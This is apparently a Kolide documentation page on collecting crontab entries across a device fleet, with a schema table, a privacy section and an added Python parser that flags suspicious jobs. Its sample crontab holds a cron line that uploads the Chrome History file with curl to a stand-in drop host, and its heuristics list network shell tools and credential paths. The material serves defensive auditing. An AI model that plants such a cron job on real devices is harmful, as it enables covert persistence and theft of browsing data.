How to List Crontab Entries Across All Mac, Windows, and Linux Devices
Using Kolide, you can easily view and query Crontab Entries across your fleet.
Introduction
macOS and Linux devices have a file called a crontab which manages scheduled tasks. A crontab file contains the instruction set for a device's cron daemon in the following simplified form: "run X command, at Y time, on Z date". Each user can define their own crontab, and the commands in a crontab are executed as the user who owns it, with that user's permissions.
The crontab inventory contains information about the commands scheduled to run, the user context to run them in, and the interval they will run on.
What Crontab Entry Data Can Kolide Collect?
Kolide's endpoint agent bundles osquery to efficiently collect Crontab Entries from Mac, Windows, and Linux devices in your fleet. Once collected, Kolide parses, cleans up, and centrally stores this data in Inventory for your team to view, query, or export via the API.
Kolide meticulously documents every piece of data returned so you can understand the results.
Crontab Entries Schema
Column | Type | Description
---|---|---
id | Primary Key | Unique identifier for the object
device_id | Foreign Key | Device associated with the entry
device_name | Text | Display name of the device associated with the entry
command | Text | Raw command string
day_of_month | Text | The day of the month for the job
day_of_week | Text | The day of the week for the job
event | Text | The job @event name (rare)
hour | Text | The hour of the day for the job
minute | Text | The exact minute for the job
month | Text | The month of the year for the job
path | Text | File parsed
collected_at | Timestamp | Time the row of data was first collected in the database
updated_at | Timestamp | Time the row of data was last changed in the database
Why Should I Collect Crontab Entries?
Because cron can silently execute commands on a device on a recurring schedule, the crontab is a common target for malware looking for a persistence mechanism. For example, malware that wanted to exfiltrate your Chrome browser history could schedule a cron job that connects to a remote file-drop URL and uploads your Chrome History database.
For this reason, it is important for IT administrators to be able to review and audit the contents of each crontab, so that entries that may be indicators of compromise are not missed.
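The following added example (not Kolide's or osquery's code) shows how the five schedule fields, the @event form, and the raw command of a crontab line map onto the Crontab Entries schema above, and then runs a simple review pass of the kind the persistence concern calls for. The crontab text, the file path, and the review heuristics are constructed for illustration and are assumptions, not Kolide features.

```python
"""Parse a user crontab into rows shaped like the Crontab Entries schema
and flag rows an administrator would want to look at.

Added example, not Kolide's or osquery's own code. Row fields follow the
schema on this page (minute, hour, day_of_month, month, day_of_week, event,
command, path); device_id, device_name and the timestamps are assigned by
the inventory and are omitted here.
"""
import re
from dataclasses import dataclass, asdict
from typing import Dict, List, Tuple

# Constructed sample crontab for one user (not captured from a real device).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
30 2 * * * /usr/local/bin/backup.sh --target 10.0.0.5
*/15 * * * 1-5 /usr/local/bin/timecard checkin
@reboot /opt/agent/start.sh
0 * * * * curl -s https://example.invalid/drop -T "$HOME/Library/Application Support/Google/Chrome/Default/History"
"""

# Assumed location of the parsed file (Linux layout); macOS keeps user crontabs elsewhere.
SAMPLE_PATH = "/var/spool/cron/crontabs/alice"


@dataclass
class CrontabEntry:
    path: str
    command: str
    minute: str = ""
    hour: str = ""
    day_of_month: str = ""
    month: str = ""
    day_of_week: str = ""
    event: str = ""


_ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text: str, path: str) -> List[CrontabEntry]:
    """Turn crontab text into schema-shaped entries; non-job lines are skipped."""
    entries: List[CrontabEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ENV_LINE.match(line):
            continue  # blank lines, comments and VAR=value lines schedule nothing
        if line.startswith("@"):
            # "@reboot command" style lines populate the (rare) event column
            event, _, command = line.partition(" ")
            entries.append(CrontabEntry(path=path, command=command.strip(), event=event))
            continue
        fields = line.split(None, 5)  # five schedule fields, rest is the command
        if len(fields) < 6:
            continue  # malformed line; cron would reject it as well
        minute, hour, dom, mon, dow, command = fields
        entries.append(CrontabEntry(path=path, command=command, minute=minute, hour=hour,
                                    day_of_month=dom, month=mon, day_of_week=dow))
    return entries


def to_rows(entries: List[CrontabEntry]) -> List[Dict[str, str]]:
    """Dict rows keyed by the schema column names, ready to load or compare."""
    return [asdict(e) for e in entries]


# Assumed review heuristics: download/upload tools, payload decoding and
# browser or credential paths are what a persistence job tends to reference.
NETWORK_TOOLS = ("curl", "wget", "nc ", "ncat", "python -c", "base64 -d", "bash -i")
SENSITIVE_PATHS = ("Chrome/", "Firefox/", ".ssh/", "Keychains/")


def review_entry(entry: CrontabEntry) -> List[str]:
    """Return human-readable reasons an entry deserves a look (empty if none)."""
    reasons = []
    if any(tool in entry.command for tool in NETWORK_TOOLS):
        reasons.append("command invokes a network or decoding tool")
    if any(p in entry.command for p in SENSITIVE_PATHS):
        reasons.append("command references browser, key or credential data")
    if entry.event == "@reboot":
        reasons.append("runs at every boot (@reboot)")
    return reasons


def audit(text: str, path: str) -> List[Tuple[CrontabEntry, List[str]]]:
    """Parse a crontab and return only the entries that tripped a heuristic."""
    return [(e, review_entry(e)) for e in parse_crontab(text, path) if review_entry(e)]


if __name__ == "__main__":
    for row in to_rows(parse_crontab(SAMPLE_CRONTAB, SAMPLE_PATH)):
        print(row)
    for entry, reasons in audit(SAMPLE_CRONTAB, SAMPLE_PATH):
        print("REVIEW:", entry.command, "->", "; ".join(reasons))
```

The backup job that reaches a private IP and the timecard check-in pass through unflagged, which matches the privacy point below: the same schedule fields can describe routine personal automation, so the heuristics here are a starting point for review, not a verdict.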
End-User Privacy Consideration
Kolide practices Honest Security. We believe that data should be collected from end-user devices transparently and with privacy in mind.
Because end-users can put whatever they like in their crontab, it is possible that entries contain sensitive or suggestive information. For example, you could configure a cron job that performed a timecard service check-in at a specified interval, in the morning and afternoon, every day of the week while you were not at your device. Likewise, you could configure the crontab to reach out to a private IP or domain as part of a backup service.
When you use Kolide to list Crontab Entry data from end-user devices, Kolide gives the people using those devices insight into exactly what data is collected, the privacy implications, and who on the IT team can see the data. This all happens in our end-user privacy center which can be accessed directly by employees.